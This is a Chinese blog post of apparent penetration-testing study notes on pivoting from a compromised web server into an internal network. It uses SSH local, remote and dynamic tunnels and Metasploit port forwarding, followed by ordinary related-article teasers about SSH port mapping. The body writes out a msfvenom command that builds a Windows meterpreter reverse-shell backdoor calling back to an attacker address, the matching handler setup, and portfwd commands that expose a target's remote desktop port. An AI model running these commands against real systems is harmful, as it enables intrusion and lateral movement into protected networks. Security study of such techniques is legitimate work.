SSH隧道技术及端口映射与转发

最新推荐文章于 2024-05-13 11:03:44 发布
最新推荐文章于 2024-05-13 11:03:44 发布
阅读量3.7k 收藏 4
点赞数
文章标签: 网络安全 渗透测试 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51313985/article/details/123680285
版权
拓扑图

在这里插入图片描述
假定攻击机已拿下web服务器且无法访问数据库服务器,以下未说明的ssh命令均在web服务器上完成

ssh正向连接
ssh -CNfL 0.0.0.0:5555:10.10.10.124:80 web@127.0.0.1

正向代理完成后,可以在攻击机访问192.168.1.100:5555即可获取到10.10.10.124的80端口部署的内容。

ssh反向连接
ssh -qTfnN -R port:host:hostport remote ip
ssh -qTfnN -R 2222:127.0.0.1:22 root@192.168.0.200
攻击机:ssh -p 2222 web@127.0.0.1
       curl http://10.10.10.124

web服务器向攻击机完成反向连接后,攻击机ssh -p修改22端口为2222端口连接到web服务器使用curl命令即可访问10.10.10.124

sockets代理
ssh -qTfnN -D 10000 root@192.168.0.200

之后浏览器走192.168.0.200:10000的代理即可

端口映射

metasploit生成后门:

msfvenom -p windows/meterpreter/reverse_tcp|host=192.168.0.200|port=12345 -f exe >/var/www/html/aa.exe

msf监听模块
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.200
set lport 12345
exploit

在目标机上运行后面程序,攻击机上监听就会返回meterpreter会话

攻击机:portfwd flush (清除下记录)
       portfwd add -L 192.168.0.200 -l 2022 -p 80 -r 10.10.10.124

成功映射之后,访问192.168.0.200:2022即可看到10.10.10.124:80端口部署的内容

端口转发
攻击机:portfwd add -l 5555 -p 3389 -r 192.168.1.100
       rdesktop 127.0.0.1:5555

接着在meterpreter会话实现转发目标的3389端口,在攻击机本地访问127.0.0.1:5555端口即可实现远程桌面登录,进而访问10.10.10.124

开始学习内网很多地方不是很明白,若有错误还望师傅们指正。

bay0net
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Go-Shipspotter-用于通过SSH将端口隧道转发到远程Docker容器的工具
08-13
Go-Shipspotter 是一个基于 Go 语言开发的实用工具,专门设计用于通过 SSH(Secure Shell)协议将端口隧道转发到远程 Docker 容器。这个工具为开发者提供了一种安全且便捷的方式,来访问运行在远程服务器上的 Docker...
Python-通过SSH共享本地主机使得本地远程端口转发变得容易
08-10
`sshuttle`可以让你的本机TCP流量通过SSH隧道转发,而无需任何配置更改,特别适合在不支持SSH端口转发的网络环境中使用。 通过Python实现SSH端口转发,能够帮助开发者在不安全的网络环境中安全地访问远程服务,同时...
SSH实际常用转发
weixin_34326558的博客
06-14 327
可以将远端服务器一个端口remote_port绑定到本地端口port,其中-C是进行数据压缩,-f是后台操作,只有当提示用户名密码的时候才转向前台。-N是不执行远端命令,在只是端口转发时这条命令很有用处。-g 是允许远端主机连接本地转发端口。-R表明是将远端主机端口映射到本地端口。如果是-L,则是将本地端口映射到远端主机端口。 ssh的三个强大的端口转发命令: 转发到远端...
ssh端口映射-访问本地映射的目标主机映射的Docker容器中的jupyter
weixin_41467446的博客
06-10 2250
我的电脑是本地主机,同事的电脑(3080TI)是目标主机,系统中有容器,我需要连接目标主机中的容器,需要图形界面或文件夹目录。只使用vscode或SFTP客户端是看不到容器中的文件和图形界面的,于是探索了使用jupyter访问容器中的文件夹。......
渗透测试笔记】之【内网渗透——应用层隧道SSH隧道的使用:本地、远程端口转发(1)
最新发布
2401_84970145的博客
05-13 541
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
ssh配置端口映射
akko
06-01 798
出于安全考虑,如果 SSH 服务器 没有开启允许 GatewayPorts 选项,则即使指定了 远程 IP,也仍然只会绑定到 127.0.0.1.在 /etc/ssh/sshd_config 配置文件中找到 GatewayPorts,设置为 yes,并重启 sshd 服务。重启sshd方法:sevice ssh restart 或者 /etc/rc.d/init.d/ssh restart。如有需要可以开启tcp转发: AllowAgentForwarding yes。
3剑客第10天练习题_linux截取ip,并用ip 192,2024Linux运维大厂面试集合
2401_83946070的博客
04-15 519
本书是获得了很多读者好评的Linux经典畅销书**《Linux从入门到精通》的第2版**。本书第﹖版以最新的Ubuntu 12.04为版本,循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论。/排除内容/{print}’ 文件名。sed -n ‘/排除内容/!1.如何进行排除过滤?
ssh端口映射总结
热门推荐
boliang319的专栏
09-22 1万+
ssh的确很强大,可以很方便的实现从本地端口到远程端口的映射,通常情况下使用 -L 或者 -R参数,例如: ssh xxx@xxx.xxx -L 8080:RemoteIP:RemotePort 但是需要说明的是RemoteIP可以是127.0.0.1,此时127.0.0.1指的是远程计算机,而非本机地址。
使用SSH映射远程端口至本地
Adonisyc的博客
05-09 3227
使用SSH映射远程端口至本地
tunnelme:反向 SSHSSH 隧道
06-13
标题 "tunnelme:反向 SSHSSH 隧道" 涉及到的是一个与网络连接和安全相关的工具或技术,特别是如何利用 SSH(Secure Shell)来创建隧道进行远程访问SSH 是一种用于安全地远程登录到服务器、执行命令和传输数据...
端口转发工具
04-03
这个过程通常被称为端口映射或端口隧道,是网络通信中的一个重要概念,尤其在处理远程访问、安全连接和网络隔离等方面。 端口转发的主要原理是利用TCP/IP协议栈中的端口号来实现数据包的定向。每个通过网络发送的...
SSH服务器映射成本地网络驱动器的工具
04-24
SSH服务器映射成本地网络驱动器的工具,当做本地存储空间
内网端口自动映射工具.rar
05-05
- **远程桌面/SSH访问**:如果你在家办公,需要从公司远程访问家中的电脑,或者你需要通过SSH连接到内网服务器进行维护,内网端口映射工具可以帮你实现。 - **共享内网资源**:比如你有一台内网服务器运行着网站、...
通过ssh映射端口
zphj1987的博客
08-12 2630
需求 有一台内网机器想被外网的机器访问某个端口,但是这台机器没有公网ip,那么可以通过ssh以及一台远程的带公网ip的机器实现 步骤 这个命令很简单 ssh -NTf -R 34:192.168.0.201:5900 root@59.172.78.221 -p 22 上面的命令的意思是 把192.168.0.201的5900端口映射到远程机器59.172.78.221的34端口,然后通过59.172.78.221的34端口就能访问内网机器192.168.0.201的5900端口了 ...
SSH 代理功能
xiaokurong的专栏
10-24 1万+
1.  SSH 的端口转发(映射) 环境: 在一个网络中有多台服务器(A,B,C),一台(A)可以被外网访问,其他不能被外网访问,B,C上有服务;          A-内网IP:  172.16.10.1    A-外网IP:  172.1.1.1     B-IP: 172.16.10.2    C-IP: 172.10.16.3 目的:从外网访问B,C上的服务。 方法: 在A上做ss
sshssh端口映射的区别
WANYL的博客
03-13 1293
ssh -L :: <SSH地址> ssh -R :: <SSH地址> 参数-L就是监听端口在执行ssh的机器上建立,参数:由<SSH地址>主机处理 参数-R就是监听端口在<SSH地址>主机上建立,参数:由执行ssh的机器处理 原文参考 http://www.wy182000.com/2013/11/15/ssh-r-l-d/ ...
SSH本地端口映射到公网IP的相关设置
qq_40930171的博客
06-28 2833
SSH本地端口映射到公网IP的相关设置 在项目实训过程中,后端写完接口需要在前端进行调用,这时就需要在公网而非本地端口访问,因此需要用到这个技术 SSH的两种命令 首先需要了解 SSH的两种命令:正向代理(-L)与反向代理(-R) 正向代理是从本地端口转发数据,即将本地的请求转发到远程端口。 反向代理则相反,将数据从远程端口转发到本地端口,这样的话就可以接收到远端的信息从而外部调用本地接口。因此使用反向代理。 具体配置过程 首先进入服务器页面开启相应的端口 输入如下命令 ssh -R remotePort
ssh实现简单的端口映射
Darren的博客
09-05 3729
ssh实现端口映射 当一台服务器拥有公网IP,或者域名解析的时候(这个可以使用ddns进行配置),我们其他的服务器上面的服务也想映射出来,那么我们可以选择重新获取一个公网IP或者域名解析,但是这种方法会增加我们的消费,下面我们使用ssh来实现端口映射,从而实现其他服务器上的服务也能实现外网访问的操作。 ssh的端口转发命令: 转发到远端:ssh -C -f -N -g -L 本地端口:目标IP:...
ssh 公司服务器 映射,ssh端口映射
weixin_28705579的博客
07-30 387
ssh -f -N -g -L 12345:localhost:19229 root@ss -b 0.0.0.0ssh -f -N -g -L 12346:localhost:19229 root@ss -b 0.0.0.0ssh -f -N -g -L 12347:localhost:19229 root@ss -b 0.0.0.0ssh -f -N -g -L 12348:localhost:...
路由器ssh端口映射
10-14
要进行路由器ssh端口映射,需要先进入路由器的管理界面,找到端口映射/端口转发等相关设置选项,然后将路由器的SSH端口号(默认为22)映射到需要访问的设备的SSH端口号上。 具体步骤如下: 1. 打开浏览器,输入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值